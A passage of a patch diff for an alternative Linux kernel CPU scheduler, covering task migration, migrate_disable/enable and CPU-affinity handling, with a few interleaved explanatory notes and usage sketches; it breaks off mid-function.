-+ * deactivate_task - remove a task from the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static inline void deactivate_task(struct task_struct *p, struct rq *rq)
-+{
-+	dequeue_task(p, rq, DEQUEUE_SLEEP);
-+	p->on_rq = 0;
-+	cpufreq_update_util(rq, 0);
-+}
-+
-+static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
-+	 * successfully executed on another CPU. We must ensure that updates of
-+	 * per-task data have been completed by this moment.
-+	 */
-+	smp_wmb();
-+
-+	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
-+#endif
-+}
-+
-+static inline bool is_migration_disabled(struct task_struct *p)
-+{
-+#ifdef CONFIG_SMP
-+	return p->migration_disabled;
-+#else
-+	return false;
-+#endif
-+}
-+
-+#define SCA_CHECK		0x01
-+#define SCA_USER		0x08
-+
-+#ifdef CONFIG_SMP
-+
-+void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
-+{
-+#ifdef CONFIG_SCHED_DEBUG
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * We should never call set_task_cpu() on a blocked task,
-+	 * ttwu() will sort out the placement.
-+	 */
-+	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
-+
-+#ifdef CONFIG_LOCKDEP
-+	/*
-+	 * The caller should hold either p->pi_lock or rq->lock, when changing
-+	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
-+	 *
-+	 * sched_move_task() holds both and thus holding either pins the cgroup,
-+	 * see task_group().
-+	 */
-+	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
-+				      lockdep_is_held(&task_rq(p)->lock)));
-+#endif
-+	/*
-+	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
-+	 */
-+	WARN_ON_ONCE(!cpu_online(new_cpu));
-+
-+	WARN_ON_ONCE(is_migration_disabled(p));
-+#endif
-+	trace_sched_migrate_task(p, new_cpu);
-+
-+	if (task_cpu(p) != new_cpu) {
-+		rseq_migrate(p);
-+		perf_event_task_migrate(p);
-+	}
-+
-+	__set_task_cpu(p, new_cpu);
-+}
-+
-+#define MDF_FORCE_ENABLED	0x80
-+
-+static void
-+__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	/*
-+	 * This here violates the locking rules for affinity, since we're only
-+	 * supposed to change these variables while holding both rq->lock and
-+	 * p->pi_lock.
-+	 *
-+	 * HOWEVER, it magically works, because ttwu() is the only code that
-+	 * accesses these variables under p->pi_lock and only does so after
-+	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
-+	 * before finish_task().
-+	 *
-+	 * XXX do further audits, this smells like something putrid.
-+	 */
-+	SCHED_WARN_ON(!p->on_cpu);
-+	p->cpus_ptr = new_mask;
-+}
-+
-+void migrate_disable(void)
-+{
-+	struct task_struct *p = current;
-+	int cpu;
-+
-+	if (p->migration_disabled) {
-+		p->migration_disabled++;
-+		return;
-+	}
-+
-+	preempt_disable();
-+	cpu = smp_processor_id();
-+	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
-+		cpu_rq(cpu)->nr_pinned++;
-+		p->migration_disabled = 1;
-+		p->migration_flags &= ~MDF_FORCE_ENABLED;
-+
-+		/*
-+		 * Violates locking rules! see comment in __do_set_cpus_ptr().
-+		 */
-+		if (p->cpus_ptr == &p->cpus_mask)
-+			__do_set_cpus_ptr(p, cpumask_of(cpu));
-+	}
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_disable);
-+
-+void migrate_enable(void)
-+{
-+	struct task_struct *p = current;
-+
-+	if (0 == p->migration_disabled)
-+		return;
-+
-+	if (p->migration_disabled > 1) {
-+		p->migration_disabled--;
-+		return;
-+	}
-+
-+	if (WARN_ON_ONCE(!p->migration_disabled))
-+		return;
-+
-+	/*
-+	 * Ensure stop_task runs either before or after this, and that
-+	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
-+	 */
-+	preempt_disable();
-+	/*
-+	 * Assumption: current should be running on allowed cpu
-+	 */
-+	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
-+	if (p->cpus_ptr != &p->cpus_mask)
-+		__do_set_cpus_ptr(p, &p->cpus_mask);
-+	/*
-+	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
-+	 * regular cpus_mask, otherwise things that race (eg.
-+	 * select_fallback_rq) get confused.
-+	 */
-+	barrier();
-+	p->migration_disabled = 0;
-+	this_rq()->nr_pinned--;
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_enable);
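
As the code above shows, migrate_disable()/migrate_enable() nest through a
per-task counter, and only the outermost pair actually pins cpus_ptr to the
current CPU and adjusts rq->nr_pinned. Callers just bracket per-CPU work; a
sketch (not from the patch):

#include <linux/preempt.h>
#include <linux/printk.h>
#include <linux/smp.h>

static void demo_percpu_work(void)
{
	migrate_disable();	/* preemption stays possible; migration doesn't */

	/* smp_processor_id() is stable for this whole region, even if a
	 * callee nests another migrate_disable()/migrate_enable() pair. */
	pr_info("pinned on cpu %d\n", smp_processor_id());

	migrate_enable();
}
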
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return rq->nr_pinned;
-+}
-+
-+/*
-+ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
-+ * __set_cpus_allowed_ptr() and select_fallback_rq().
-+ */
-+static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
-+{
-+	/* When not in the task's cpumask, no point in looking further. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/* migrate_disabled() must be allowed to finish. */
-+	if (is_migration_disabled(p))
-+		return cpu_online(cpu);
-+
-+	/* Non kernel threads are not allowed during either online or offline. */
-+	if (!(p->flags & PF_KTHREAD))
-+		return cpu_active(cpu) && task_cpu_possible(cpu, p);
-+
-+	/* KTHREAD_IS_PER_CPU is always allowed. */
-+	if (kthread_is_per_cpu(p))
-+		return cpu_online(cpu);
-+
-+	/* Regular kernel threads don't get to stay during offline. */
-+	if (cpu_dying(cpu))
-+		return false;
-+
-+	/* But are allowed during online. */
-+	return cpu_online(cpu);
-+}
-+
-+/*
-+ * This is how migration works:
-+ *
-+ * 1) we invoke migration_cpu_stop() on the target CPU using
-+ *    stop_one_cpu().
-+ * 2) stopper starts to run (implicitly forcing the migrated thread
-+ *    off the CPU)
-+ * 3) it checks whether the migrated task is still in the wrong runqueue.
-+ * 4) if it's in the wrong runqueue then the migration thread removes
-+ *    it and puts it into the right queue.
-+ * 5) stopper completes and stop_one_cpu() returns and the migration
-+ *    is done.
-+ */
-+
-+/*
-+ * move_queued_task - move a queued task to new rq.
-+ *
-+ * Returns (locked) new rq. Old rq's lock is released.
-+ */
-+static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
-+				   new_cpu)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
-+	dequeue_task(p, rq, 0);
-+	update_sched_preempt_mask(rq);
-+	set_task_cpu(p, new_cpu);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rq = cpu_rq(new_cpu);
-+
-+	raw_spin_lock(&rq->lock);
-+	WARN_ON_ONCE(task_cpu(p) != new_cpu);
-+	sched_task_sanity_check(p, rq);
-+	enqueue_task(p, rq, 0);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+	check_preempt_curr(rq);
-+
-+	return rq;
-+}
-+
-+struct migration_arg {
-+	struct task_struct *task;
-+	int dest_cpu;
-+};
-+
-+/*
-+ * Move a (non-current) task off this CPU, onto the destination CPU. We're doing
-+ * this because either it can't run here any more (set_cpus_allowed()
-+ * away from this CPU, or CPU going down), or because we're
-+ * attempting to rebalance this task on exec (sched_exec).
-+ *
-+ * So we race with normal scheduler movements, but that's OK, as long
-+ * as the task is no longer on this CPU.
-+ */
-+static struct rq *__migrate_task(struct rq *rq, struct task_struct *p,
-+				 int dest_cpu)
-+{
-+	/* Affinity changed (again). */
-+	if (!is_cpu_allowed(p, dest_cpu))
-+		return rq;
-+
-+	update_rq_clock(rq);
-+	return move_queued_task(rq, p, dest_cpu);
-+}
-+
-+/*
-+ * migration_cpu_stop - this will be executed by a highprio stopper thread
-+ * and performs thread migration by bumping the thread off the CPU, then
-+ * 'pushing' it onto another runqueue.
-+ */
-+static int migration_cpu_stop(void *data)
-+{
-+	struct migration_arg *arg = data;
-+	struct task_struct *p = arg->task;
-+	struct rq *rq = this_rq();
-+	unsigned long flags;
-+
-+	/*
-+	 * The original target CPU might have gone down and we might
-+	 * be on another CPU but it doesn't matter.
-+	 */
-+	local_irq_save(flags);
-+	/*
-+	 * We need to explicitly wake pending tasks before running
-+	 * __migrate_task() such that we will not miss enforcing cpus_ptr
-+	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
-+	 */
-+	flush_smp_call_function_queue();
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+	/*
-+	 * If task_rq(p) != rq, it cannot be migrated here, because we're
-+	 * holding rq->lock; if p->on_rq == 0 it cannot get enqueued because
-+	 * we're holding p->pi_lock.
-+	 */
-+	if (task_rq(p) == rq && task_on_rq_queued(p))
-+		rq = __migrate_task(rq, p, arg->dest_cpu);
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+
-+	return 0;
-+}
-+
-+static inline void
-+set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	cpumask_copy(&p->cpus_mask, new_mask);
-+	p->nr_cpus_allowed = cpumask_weight(new_mask);
-+}
-+
-+static void
-+__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	lockdep_assert_held(&p->pi_lock);
-+	set_cpus_allowed_common(p, new_mask);
-+}
-+
-+void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	__do_set_cpus_allowed(p, new_mask);
-+}
-+
-+int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
-+		      int node)
-+{
-+	if (!src->user_cpus_ptr)
-+		return 0;
-+
-+	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
-+	if (!dst->user_cpus_ptr)
-+		return -ENOMEM;
-+
-+	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
-+	return 0;
-+}
-+
-+static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = NULL;
-+
-+	swap(p->user_cpus_ptr, user_mask);
-+
-+	return user_mask;
-+}
-+
-+void release_user_cpus_ptr(struct task_struct *p)
-+{
-+	kfree(clear_user_cpus_ptr(p));
-+}
-+
-+#endif
-+
-+/**
-+ * task_curr - is this task currently executing on a CPU?
-+ * @p: the task in question.
-+ *
-+ * Return: 1 if the task is currently executing. 0 otherwise.
-+ */
-+inline int task_curr(const struct task_struct *p)
-+{
-+	return cpu_curr(task_cpu(p)) == p;
-+}
-+
-+#ifdef CONFIG_SMP
-+/*
-+ * wait_task_inactive - wait for a thread to unschedule.
-+ *
-+ * Wait for the thread to block in any of the states set in @match_state.
-+ * If it changes, i.e. @p might have woken up, then return zero.  When we
-+ * succeed in waiting for @p to be off its CPU, we return a positive number
-+ * (its total switch count).  If a second call a short while later returns the
-+ * same number, the caller can be sure that @p has remained unscheduled the
-+ * whole time.
-+ *
-+ * The caller must ensure that the task *will* unschedule sometime soon,
-+ * else this function might spin for a *long* time. This function can't
-+ * be called with interrupts off, or it may introduce deadlock with
-+ * smp_call_function() if an IPI is sent by the same process we are
-+ * waiting to become inactive.
-+ */
-+unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
-+{
-+	unsigned long flags;
-+	bool running, on_rq;
-+	unsigned long ncsw;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+
-+		/*
-+		 * If the task is actively running on another CPU
-+		 * still, just relax and busy-wait without holding
-+		 * any locks.
-+		 *
-+		 * NOTE! Since we don't hold any locks, it's not
-+		 * even sure that "rq" stays as the right runqueue!
-+		 * But we don't care, since this will return false
-+		 * if the runqueue has changed and p is actually now
-+		 * running somewhere else!
-+		 */
-+		while (task_on_cpu(p) && p == rq->curr) {
-+			if (!(READ_ONCE(p->__state) & match_state))
-+				return 0;
-+			cpu_relax();
-+		}
-+
-+		/*
-+		 * Ok, time to look more closely! We need the rq
-+		 * lock now, to be *sure*. If we're wrong, we'll
-+		 * just go back and repeat.
-+		 */
-+		task_access_lock_irqsave(p, &lock, &flags);
-+		trace_sched_wait_task(p);
-+		running = task_on_cpu(p);
-+		on_rq = p->on_rq;
-+		ncsw = 0;
-+		if (READ_ONCE(p->__state) & match_state)
-+			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
-+		task_access_unlock_irqrestore(p, lock, &flags);
-+
-+		/*
-+		 * If it changed from the expected state, bail out now.
-+		 */
-+		if (unlikely(!ncsw))
-+			break;
-+
-+		/*
-+		 * Was it really running after all now that we
-+		 * checked with the proper locks actually held?
-+		 *
-+		 * Oops. Go back and try again..
-+		 */
-+		if (unlikely(running)) {
-+			cpu_relax();
-+			continue;
-+		}
-+
-+		/*
-+		 * It's not enough that it's not actively running,
-+		 * it must be off the runqueue _entirely_, and not
-+		 * preempted!
-+		 *
-+		 * So if it was still runnable (but just not actively
-+		 * running right now), it's preempted, and we should
-+		 * yield - it could be a while.
-+		 */
-+		if (unlikely(on_rq)) {
-+			ktime_t to = NSEC_PER_SEC / HZ;
-+
-+			set_current_state(TASK_UNINTERRUPTIBLE);
-+			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
-+			continue;
-+		}
-+
-+		/*
-+		 * Ahh, all good. It wasn't running, and it wasn't
-+		 * runnable, which means that it will never become
-+		 * running in the future either. We're all done!
-+		 */
-+		break;
-+	}
-+
-+	return ncsw;
-+}
-+
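To make the ncsw contract above concrete, a sketch of a caller (hypothetical; inspect_remote_task() is a placeholder) that calls twice and compares switch counts to prove @p never ran in between:

	static bool stayed_off_cpu(struct task_struct *p)
	{
		unsigned long ncsw = wait_task_inactive(p, TASK_UNINTERRUPTIBLE);

		if (!ncsw)
			return false;		/* state changed; p may have run */

		inspect_remote_task(p);		/* placeholder: p is off its CPU here */

		/* an unchanged switch count means p stayed unscheduled throughout */
		return wait_task_inactive(p, TASK_UNINTERRUPTIBLE) == ncsw;
	}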
-+/***
-+ * kick_process - kick a running thread to enter/exit the kernel
-+ * @p: the to-be-kicked thread
-+ *
-+ * Cause a process which is running on another CPU to enter
-+ * kernel-mode, without any delay. (to get signals handled.)
-+ *
-+ * NOTE: this function doesn't have to take the runqueue lock,
-+ * because all it wants to ensure is that the remote task enters
-+ * the kernel. If the IPI races and the task has been migrated
-+ * to another CPU then no harm is done and the purpose has been
-+ * achieved as well.
-+ */
-+void kick_process(struct task_struct *p)
-+{
-+	int cpu;
-+
-+	preempt_disable();
-+	cpu = task_cpu(p);
-+	if ((cpu != smp_processor_id()) && task_curr(p))
-+		smp_send_reschedule(cpu);
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(kick_process);
-+
-+/*
-+ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
-+ *
-+ * A few notes on cpu_active vs cpu_online:
-+ *
-+ *  - cpu_active must be a subset of cpu_online
-+ *
-+ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
-+ *    see __set_cpus_allowed_ptr(). At this point the newly online
-+ *    CPU isn't yet part of the sched domains, and balancing will not
-+ *    see it.
-+ *
-+ *  - on cpu-down we clear cpu_active() to mask the sched domains and
-+ *    avoid the load balancer placing new tasks on the to-be-removed
-+ *    CPU. Existing tasks will remain running there and will be taken
-+ *    off.
-+ *
-+ * This means that fallback selection must not select !active CPUs,
-+ * and can assume that any active CPU must be online. Conversely,
-+ * select_task_rq() below may allow selection of !active CPUs in order
-+ * to satisfy the above rules.
-+ */
-+static int select_fallback_rq(int cpu, struct task_struct *p)
-+{
-+	int nid = cpu_to_node(cpu);
-+	const struct cpumask *nodemask = NULL;
-+	enum { cpuset, possible, fail } state = cpuset;
-+	int dest_cpu;
-+
-+	/*
-+	 * If the node that the CPU is on has been offlined, cpu_to_node()
-+	 * will return -1. There is no CPU on the node, and we should
-+	 * select the CPU on the other node.
-+	 */
-+	if (nid != -1) {
-+		nodemask = cpumask_of_node(nid);
-+
-+		/* Look for allowed, online CPU in same node. */
-+		for_each_cpu(dest_cpu, nodemask) {
-+			if (is_cpu_allowed(p, dest_cpu))
-+				return dest_cpu;
-+		}
-+	}
-+
-+	for (;;) {
-+		/* Any allowed, online CPU? */
-+		for_each_cpu(dest_cpu, p->cpus_ptr) {
-+			if (!is_cpu_allowed(p, dest_cpu))
-+				continue;
-+			goto out;
-+		}
-+
-+		/* No more Mr. Nice Guy. */
-+		switch (state) {
-+		case cpuset:
-+			if (cpuset_cpus_allowed_fallback(p)) {
-+				state = possible;
-+				break;
-+			}
-+			fallthrough;
-+		case possible:
-+			/*
-+			 * XXX When called from select_task_rq() we only
-+			 * hold p->pi_lock and again violate locking order.
-+			 *
-+			 * More yuck to audit.
-+			 */
-+			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
-+			state = fail;
-+			break;
-+
-+		case fail:
-+			BUG();
-+			break;
-+		}
-+	}
-+
-+out:
-+	if (state != cpuset) {
-+		/*
-+		 * Don't tell them about moving exiting tasks or
-+		 * kernel threads (both mm NULL), since they never
-+		 * leave the kernel.
-+		 */
-+		if (p->mm && printk_ratelimit()) {
-+			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
-+					task_pid_nr(p), p->comm, cpu);
-+		}
-+	}
-+
-+	return dest_cpu;
-+}
-+
-+static inline void
-+sched_preempt_mask_flush(cpumask_t *mask, int prio)
-+{
-+	int cpu;
-+
-+	cpumask_copy(mask, sched_idle_mask);
-+
-+	for_each_cpu_not(cpu, mask) {
-+		if (prio < cpu_rq(cpu)->prio)
-+			cpumask_set_cpu(cpu, mask);
-+	}
-+}
-+
-+static inline int
-+preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
-+{
-+	int task_prio = task_sched_prio(p);
-+	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
-+	int pr = atomic_read(&sched_prio_record);
-+
-+	if (pr != task_prio) {
-+		sched_preempt_mask_flush(mask, task_prio);
-+		atomic_set(&sched_prio_record, task_prio);
-+	}
-+
-+	return cpumask_and(preempt_mask, allow_mask, mask);
-+}
-+
-+static inline int select_task_rq(struct task_struct *p)
-+{
-+	cpumask_t allow_mask, mask;
-+
-+	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
-+		return select_fallback_rq(task_cpu(p), p);
-+
-+	if (
-+#ifdef CONFIG_SCHED_SMT
-+	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
-+#endif
-+	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
-+	    preempt_mask_check(p, &allow_mask, &mask))
-+		return best_mask_cpu(task_cpu(p), &mask);
-+
-+	return best_mask_cpu(task_cpu(p), &allow_mask);
-+}
-+
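Read as a cascade, select_task_rq() above prefers, in order: an idle SMT sibling group (with CONFIG_SCHED_SMT), any idle allowed CPU, an allowed CPU running lower-priority work per preempt_mask_check(), and finally whichever allowed CPU best_mask_cpu() ranks topologically nearest to task_cpu(p).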
-+void sched_set_stop_task(int cpu, struct task_struct *stop)
-+{
-+	static struct lock_class_key stop_pi_lock;
-+	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
-+	struct sched_param start_param = { .sched_priority = 0 };
-+	struct task_struct *old_stop = cpu_rq(cpu)->stop;
-+
-+	if (stop) {
-+		/*
-+		 * Make it appear like a SCHED_FIFO task, it's something
-+		 * userspace knows about and won't get confused by.
-+		 *
-+		 * Also, it will make PI more or less work without too
-+		 * much confusion -- but then, stop work should not
-+		 * rely on PI working anyway.
-+		 */
-+		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
-+
-+		/*
-+		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
-+		 * adjust the effective priority of a task. As a result,
-+		 * rt_mutex_setprio() can trigger (RT) balancing operations,
-+		 * which can then trigger wakeups of the stop thread to push
-+		 * around the current task.
-+		 *
-+		 * The stop task itself will never be part of the PI-chain, it
-+		 * never blocks, therefore that ->pi_lock recursion is safe.
-+		 * Tell lockdep about this by placing the stop->pi_lock in its
-+		 * own class.
-+		 */
-+		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
-+	}
-+
-+	cpu_rq(cpu)->stop = stop;
-+
-+	if (old_stop) {
-+		/*
-+		 * Reset it back to a normal scheduling policy so that
-+		 * it can die in pieces.
-+		 */
-+		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
-+	}
-+}
-+
-+static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
-+			    raw_spinlock_t *lock, unsigned long irq_flags)
-+{
-+	/* Can the task run on the task's current CPU? If so, we're done */
-+	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
-+		if (p->migration_disabled) {
-+			if (likely(p->cpus_ptr != &p->cpus_mask))
-+				__do_set_cpus_ptr(p, &p->cpus_mask);
-+			p->migration_disabled = 0;
-+			p->migration_flags |= MDF_FORCE_ENABLED;
-+			/* When p is migrate_disabled, rq->lock should be held */
-+			rq->nr_pinned--;
-+		}
-+
-+		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
-+			struct migration_arg arg = { p, dest_cpu };
-+
-+			/* Need help from migration thread: drop lock and wait. */
-+			__task_access_unlock(p, lock);
-+			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+			return 0;
-+		}
-+		if (task_on_rq_queued(p)) {
-+			/*
-+			 * OK, since we're going to drop the lock immediately
-+			 * afterwards anyway.
-+			 */
-+			update_rq_clock(rq);
-+			rq = move_queued_task(rq, p, dest_cpu);
-+			lock = &rq->lock;
-+		}
-+	}
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	return 0;
-+}
-+
-+static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
-+					 const struct cpumask *new_mask,
-+					 u32 flags,
-+					 struct rq *rq,
-+					 raw_spinlock_t *lock,
-+					 unsigned long irq_flags)
-+{
-+	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
-+	const struct cpumask *cpu_valid_mask = cpu_active_mask;
-+	bool kthread = p->flags & PF_KTHREAD;
-+	struct cpumask *user_mask = NULL;
-+	int dest_cpu;
-+	int ret = 0;
-+
-+	if (kthread || is_migration_disabled(p)) {
-+		/*
-+		 * Kernel threads are allowed on online && !active CPUs,
-+		 * however, during cpu-hot-unplug, even these might get pushed
-+		 * away if not KTHREAD_IS_PER_CPU.
-+		 *
-+		 * Specifically, migration_disabled() tasks must not fail the
-+		 * cpumask_any_and_distribute() pick below, esp. so on
-+		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
-+		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
-+		 */
-+		cpu_valid_mask = cpu_online_mask;
-+	}
-+
-+	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	/*
-+	 * Must re-check here, to close a race against __kthread_bind(),
-+	 * sched_setaffinity() is not guaranteed to observe the flag.
-+	 */
-+	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	if (cpumask_equal(&p->cpus_mask, new_mask))
-+		goto out;
-+
-+	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
-+	if (dest_cpu >= nr_cpu_ids) {
-+		ret = -EINVAL;
-+		goto out;
-+	}
-+
-+	__do_set_cpus_allowed(p, new_mask);
-+
-+	if (flags & SCA_USER)
-+		user_mask = clear_user_cpus_ptr(p);
-+
-+	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
-+
-+	kfree(user_mask);
-+
-+	return ret;
-+
-+out:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+
-+	return ret;
-+}
-+
-+/*
-+ * Change a given task's CPU affinity. Migrate the thread to a
-+ * proper CPU and schedule it away if the CPU it's executing on
-+ * is removed from the allowed bitmask.
-+ *
-+ * NOTE: the caller must have a valid reference to the task, the
-+ * task must not exit() & deallocate itself prematurely. The
-+ * call is not atomic; no spinlocks may be held.
-+ */
-+static int __set_cpus_allowed_ptr(struct task_struct *p,
-+				  const struct cpumask *new_mask, u32 flags)
-+{
-+	unsigned long irq_flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
-+}
-+
-+int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	return __set_cpus_allowed_ptr(p, new_mask, 0);
-+}
-+EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
-+
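As a usage sketch for the exported wrapper (hypothetical caller, assuming the target task does not have PF_NO_SETAFFINITY set):

	#include <linux/cpumask.h>
	#include <linux/sched.h>

	static int pin_worker(struct task_struct *worker, int cpu)
	{
		/* 0 on success; -EINVAL if no allowed online CPU remains */
		return set_cpus_allowed_ptr(worker, cpumask_of(cpu));
	}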
-+/*
-+ * Change a given task's CPU affinity to the intersection of its current
-+ * affinity mask and @subset_mask, writing the resulting mask to @new_mask
-+ * and pointing @p->user_cpus_ptr to a copy of the old mask.
-+ * If the resulting mask is empty, leave the affinity unchanged and return
-+ * -EINVAL.
-+ */
-+static int restrict_cpus_allowed_ptr(struct task_struct *p,
-+				     struct cpumask *new_mask,
-+				     const struct cpumask *subset_mask)
-+{
-+	struct cpumask *user_mask = NULL;
-+	unsigned long irq_flags;
-+	raw_spinlock_t *lock;
-+	struct rq *rq;
-+	int err;
-+
-+	if (!p->user_cpus_ptr) {
-+		user_mask = kmalloc(cpumask_size(), GFP_KERNEL);
-+		if (!user_mask)
-+			return -ENOMEM;
-+	}
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
-+	rq = __task_access_lock(p, &lock);
-+
-+	if (!cpumask_and(new_mask, &p->cpus_mask, subset_mask)) {
-+		err = -EINVAL;
-+		goto err_unlock;
-+	}
-+
-+	/*
-+	 * We're about to butcher the task affinity, so keep track of what
-+	 * the user asked for in case we're able to restore it later on.
-+	 */
-+	if (user_mask) {
-+		cpumask_copy(user_mask, p->cpus_ptr);
-+		p->user_cpus_ptr = user_mask;
-+	}
-+
-+	return __set_cpus_allowed_ptr_locked(p, new_mask, 0, rq, lock, irq_flags);
-+
-+err_unlock:
-+	__task_access_unlock(p, lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
-+	kfree(user_mask);
-+	return err;
-+}
-+
-+/*
-+ * Restrict the CPU affinity of task @p so that it is a subset of
-+ * task_cpu_possible_mask() and point @p->user_cpus_ptr to a copy of the
-+ * old affinity mask. If the resulting mask is empty, we warn and walk
-+ * up the cpuset hierarchy until we find a suitable mask.
-+ */
-+void force_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	cpumask_var_t new_mask;
-+	const struct cpumask *override_mask = task_cpu_possible_mask(p);
-+
-+	alloc_cpumask_var(&new_mask, GFP_KERNEL);
-+
-+	/*
-+	 * __migrate_task() can fail silently in the face of concurrent
-+	 * offlining of the chosen destination CPU, so take the hotplug
-+	 * lock to ensure that the migration succeeds.
-+	 */
-+	cpus_read_lock();
-+	if (!cpumask_available(new_mask))
-+		goto out_set_mask;
-+
-+	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
-+		goto out_free_mask;
-+
-+	/*
-+	 * We failed to find a valid subset of the affinity mask for the
-+	 * task, so override it based on its cpuset hierarchy.
-+	 */
-+	cpuset_cpus_allowed(p, new_mask);
-+	override_mask = new_mask;
-+
-+out_set_mask:
-+	if (printk_ratelimit()) {
-+		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
-+				task_pid_nr(p), p->comm,
-+				cpumask_pr_args(override_mask));
-+	}
-+
-+	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
-+out_free_mask:
-+	cpus_read_unlock();
-+	free_cpumask_var(new_mask);
-+}
-+
-+static int
-+__sched_setaffinity(struct task_struct *p, const struct cpumask *mask);
-+
-+/*
-+ * Restore the affinity of a task @p which was previously restricted by a
-+ * call to force_compatible_cpus_allowed_ptr(). This will clear (and free)
-+ * @p->user_cpus_ptr.
-+ *
-+ * It is the caller's responsibility to serialise this with any calls to
-+ * force_compatible_cpus_allowed_ptr(@p).
-+ */
-+void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
-+{
-+	struct cpumask *user_mask = p->user_cpus_ptr;
-+	unsigned long flags;
-+
-+	/*
-+	 * Try to restore the old affinity mask. If this fails, then
-+	 * we free the mask explicitly to avoid it being inherited across
-+	 * a subsequent fork().
-+	 */
-+	if (!user_mask || !__sched_setaffinity(p, user_mask))
-+		return;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
